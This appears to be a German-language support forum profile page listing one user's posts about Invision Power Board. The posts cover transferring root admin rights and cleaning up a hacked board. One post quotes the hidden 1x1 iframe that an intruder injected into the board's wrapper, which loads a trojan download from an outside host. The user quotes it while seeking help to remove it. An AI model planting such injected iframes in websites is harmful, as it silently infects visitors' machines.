Jump to content
InvisionCommunity.de - Der Deutsche Invision Community Support

Dan5

Mitglied
  • Content count

    23
  • Joined

  • Last visited

About Dan5

  • Rank
    Grünschnabel

IP.Board Informationen

  • IP.Board Version
    2.0.x
  1. Das war des Rätsels Lösung, danke. Da derjenige der das Script installiert die ID1 hat und automatisch die Rootrechte zugeschrieben bekommt, ging ich davon aus. Das ist natürlich falsch. :)
  2. So wie ich das sehe, kann man den Rootadmi nicht einfach so in eine andere Gruppe verschieben. Der ist geschützt. Unser Rootadmin hat die Benutzer ID8, normalerweise ist das jedoch die ID1. Der wurde schonmal mit einem SQL-Befehl von 1 auf 8 gesetzt.
  3. Hallo Mir gehört das Forum und ich kann auch via phpMyAdmin SQL-Befehle ausführen, das ist nicht das Problem. Ich suche nur eine Möglichkeit, einem anderen User die Rootrechte zu übertragen.
  4. Es gab hier im Forum einen Datenbankbefehl, mit dem man einen beliebigen User anhand der ID, Rootrechte zuweisen konnte. Also so, dass nicht die ID-1 automatisch Rootrechte hat, sondern ein beliebiger User. Sowas bräuchte ich, einfach umgekehrt. Leider finde ich dazu nichts mehr.
  5. Ich greife dieses Thema nochmals auf. Forumversion ist immernoch 1.3. Kann ich den ersten Admin, mit Rootrechten, als normalen Benutzer einstufen und einen anderen User als Root einsetzen. Geht das?
  6. Das ist gut zu wissen. Somit hat sich das Problem erledigt. Danke.
  7. Das meinte, ich die Funktionen wie SQL-Optionen und Logdateien sollen dann auch zur Verfügung stehen. Da reicht ein normaler zusätzlicher Adminaccount nicht aus. @ Stefan Zur Zeit die Version 1.3, demnächst gibt's ein Update auf die neuste Version (2.x).
  8. Es soll, nebst dem Root-Admin, noch ein weiterer User Rootrechte haben. Weitere User sind nicht notwendig. Wie meinst du das mit der sekundären Gruppe?
  9. Hallo Stefan Optimal wäre gewesen, wenn man einen User oder eine zweite Gruppe mit Rootrechten austatten könnte. Bei uns gibt es zusätzlich noch eine Gruppe "Webmaster" welche für das technische Zuständig ist. Rootrechte wären da von Vorteil. Grüsse.
  10. Board gehackt!

    Die genannten Ordner sind soweit in Ordnung; keine fremde Dateien. Das Passwort wurde auch geändert.
  11. Board gehackt!

    Hallo Stefan Alles negativ. Wie weiter? Somit alles in Ordnung? Grüsse.
  12. Kann ich irgendwie einem zweiten Admin Rootrechte geben? Grüsse.
  13. Board gehackt!

    Hallo Stefan Ich habe diese Befehle in der "mySQL Toolbox" unter "Run a Query" ausgeführt, ist das korrekt? Ich erhalten jeweils folgender Fehler: Grüsse.
  14. Board gehackt!

    Hallo Stefan Danke für die schnelle Antwort! Unbekannte Mitglieder in den Admin bzw. Moderatoren Gruppen sind nicht vorhanden. Allerdings wurde im Wrapper folgender Code eingefügt: <iframe src='http://traffall.biz/adv/195/new.php' width=1 height=1></iframe> Das dürfte auch der Übeltäter sein. Wie soll ich weitermachen? Grüsse.
  15. Hallo Unser Board wurde gehackt. Beim Besuch der Seite wird eine Datei zum Download aufgerufen, welche den Trojaner "Exploit-WMF" (Link: Torjaner Info) beinhaltet. Nun bin ich gerade dabei Peters "Security Fixes, Updates And Enhancements For IPB 1.3.1" zu installieren. Dabei bin ich auf eine Unregelmässigkeit gestossen: Unter "Step 15" wird man aufgefordert, in der Datei sources/lib/post_parser.php Code zu ergänzen. Dies soll in den Funktionen regex_check_iframe(..) und regex_check_image(..) geschehen. Problem, die Funktion regex_check_iframe(..) ist bei mir überhaupt nicht vorhanden! Auch in der eben zum Vergleich runtergeladenen 1.3.1 Version, findet sich in der Datei post_parser.php keine Funktion regex_check_iframe!? Fehler? Mich würde zudem interessieren, wie ich diesen autom. Download wieder aus dem Board kriege. Reichen die Anpassungen im genannten Mod oder muss ich den irgendwie manuell entfernen? Ich verstehe aussderm nicht, wo dieser Aufruf geschieht? Aus der Datenbank? Ich verfüge noch über eine 2.x Version, welche ich gekauft habe und auf diese ich demnächst updaten wollte. Sollte ich vielleicht gleich ein Update auf diese Version Vornehmen? Kann ich damit die Probleme beheben? Über rasche Hilfe würde ich mich freuen! Grüsse.
×